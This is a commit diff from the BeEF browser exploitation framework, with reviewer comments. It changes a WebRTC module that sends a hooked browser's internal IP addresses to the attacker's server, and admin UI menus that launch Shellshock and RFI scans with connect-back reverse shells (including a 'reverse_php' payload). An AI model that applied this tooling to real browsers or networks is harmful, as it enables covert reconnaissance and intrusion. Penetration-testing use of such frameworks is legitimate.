Fixed a bug in WebRTC command module, prevented duplicates in NetworkHost db table, removed unnecessary code.

antisnatchor
2015-02-05 12:35:23 +01:00
parent 5fc1294ca1
commit 944ba747da
7 changed files with 153 additions and 152 deletions


@@ -41,7 +41,7 @@ gem "msfrpc-client" # Metasploit Integration extension
gem "rubyzip", ">= 1.0.0"
gem "rubydns", "0.7.0" # DNS extension
gem "geoip" # geolocation support
gem "dm-serializer" # network extension
gem "dm-serializer" # network extension
# For running unit tests
if ENV['BEEF_TEST']


@@ -10,7 +10,7 @@ beef:
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
client_debug: true
# Used for generating secure tokens
crypto_default_value_length: 80
@@ -33,7 +33,7 @@ beef:
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 5000
xhr_poll_timeout: 1000
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
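Review bot: The two default changes in this file look like local debugging settings that slipped into the commit: `client_debug` appears to go from `false` to `true` and `xhr_poll_timeout` from `5000` to `1000` (the page prints old then new, so the direction is inferred). The second contradicts the NOTE directly above it, which warns that a poll timeout below 5,000 ms may impact performance, and neither change is mentioned in the commit message. If they are not intended, restore `client_debug: false` and `xhr_poll_timeout: 5000`; if they are, update the NOTE comment to match.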


@@ -30,8 +30,8 @@ ZombieTab_Network = function(zombie) {
commands_statusbar.update_fail("Error getting module id for '"+mod_name+"'");
}
});
return id;
}
return id;
};
/*
* The panel that displays all identified network services grouped by host
@@ -756,8 +756,6 @@ ZombieTab_Network = function(zombie) {
sortInfo: {field: 'ip', direction: 'ASC'}
});
var req_pagesize = 50;
var services_panel_bbar = new Ext.PagingToolbar({
pageSize: req_pagesize,
store: services_panel_store,
@@ -811,131 +809,144 @@ ZombieTab_Network = function(zombie) {
var ip = record.get('ip');
var port = record.get('port');
var proto = record.get('proto');
grid.rowCtxMenu = new Ext.menu.Menu({
items: [{
text: 'Scan ('+ip+':'+port+'/'+proto+')',
iconCls: 'network-host-ctxMenu-host',
menu: {
xtype: 'menu',
items: [{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
handler: function() {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
handler: function() {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Shellshock Scan',
iconCls: 'network-host-ctxMenu-shellshock',
handler: function() {
var mod_id = get_module_id("shell_shock_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'RFI Scan',
iconCls: 'network-host-ctxMenu-php',
handler: function() {
var mod_id = get_module_id("rfi_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
}]
});
grid.rowCtxMenu.showAt(e.getXY());
grid.rowCtxMenu = new Ext.menu.Menu({
items: [{
text: 'Scan (' + ip + ':' + port + '/' + proto + ')',
iconCls: 'network-host-ctxMenu-host',
menu: {
xtype: 'menu',
items: [{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
handler: function () {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}, {
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
handler: function () {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}, {
text: 'Shellshock Scan',
iconCls: 'network-host-ctxMenu-shellshock',
handler: function () {
var mod_id = get_module_id("shell_shock_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({
"rproto": proto,
"rhost": ip,
"rport": port,
"lhost": lhost,
"lport": lport
}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}, {
text: 'RFI Scan',
iconCls: 'network-host-ctxMenu-php',
handler: function () {
var mod_id = get_module_id("rfi_scanner");
var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
if (!lhost) {
commands_statusbar.update_fail('Cancelled');
return;
}
var lport = prompt("Enter local port for connect back shell:", 'LPORT');
if (!lport) {
commands_statusbar.update_fail('Cancelled');
return;
}
alert("Now start your reverse shell handler on " + lhost + ':' + lport);
commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({
"rproto": proto,
"rhost": ip,
"rport": port,
"lhost": lhost,
"lport": lport,
"payload": "reverse_php"
}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function (data) {
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function () {
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
}]
});
grid.rowCtxMenu.showAt(e.getXY());
},
afterrender: function(datagrid) {
datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
}
afterrender: function (datagrid) {
datagrid.store.reload({params: {nonce: Ext.get("nonce").dom.value}});
}
}
});
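Review bot: The RFI Scan handler still reports `'Shellshock scanning ' + ip + '...'` in the status bar, a copy-paste from the handler above that this reformat carries over unchanged; it should read `commands_statusbar.update_sending('RFI scanning ' + ip + '...');`. The four handlers also put `mod_id` into the request URL without checking it, although the tail of `get_module_id` visible in the first hunk suggests it can return without an id after reporting an error; a guard such as `if (!mod_id) return;` before each `$jwterm.ajax` call would avoid posting to a malformed path. ZombieTab_Network starts and ends outside these hunks.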


@@ -17,11 +17,9 @@ end
end
end
require 'extensions/network/network'
require 'extensions/network/models/network_host'
require 'extensions/network/models/network_service'
require 'extensions/network/api'
require 'extensions/network/rest/network'
require 'dm-serializer'


@@ -1,13 +0,0 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Network
end
end
end


@@ -22,7 +22,10 @@ beef.execute(function() {
// Upon an ICE candidate being found
// Grep the SDP data for IP address data
rtc.onicecandidate = function (evt) {
if (evt.candidate) grepSDP(evt.candidate.candidate);
if (evt.candidate){
console.log("a="+evt.candidate.candidate);
grepSDP("a="+evt.candidate.candidate);
}
};
// Create an SDP offer
@@ -30,12 +33,12 @@ beef.execute(function() {
grepSDP(offerDesc.sdp);
rtc.setLocalDescription(offerDesc);
}, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); });
function processIPs(newAddr) {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
beef.debug("Found IPs: "+ displayAddrs.join(","))
beef.debug("Found IPs: "+ displayAddrs.join(","))
beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","));
}
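Review bot: The `"a="` prefix added in `rtc.onicecandidate` is unexplained, and the string is built twice, once for `console.log` and once for `grepSDP`. Build it once, e.g. `var line = "a=" + evt.candidate.candidate;`, and add a comment such as `// grepSDP expects SDP attribute lines, so prefix the bare candidate with "a="` (the body of grepSDP is outside the hunk, so confirm that this is the reason). The rest of the file logs through `beef.debug`, as in `processIPs`, so the new `console.log` should follow that convention or be dropped. The `beef.execute` callback starts and ends outside these hunks.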


@@ -25,9 +25,11 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
next unless ip =~ /^[\d\.]+$/
next if ip =~ /^0\.0\.0\.0$/
next unless BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
r.save
if BeEF::Core::Models::NetworkHost.all(:ip => ip).empty? # prevent duplicates
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
r.save
end
end
end
end
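Review bot: The duplicate check `NetworkHost.all(:ip => ip).empty?` matches on IP alone, so an address already recorded for one hooked browser suppresses the record for every other browser that reports the same address; private ranges repeat across networks, so distinct hosts will be dropped. Scope the lookup to the session, `BeEF::Core::Models::NetworkHost.all(:hooked_browser_id => session_id, :ip => ip).empty?`, or use `first_or_create` with those two keys so that lookup and insert are one call. The return value of `r.save` is also ignored, so a failed save is silent. The enclosing method starts outside the hunk.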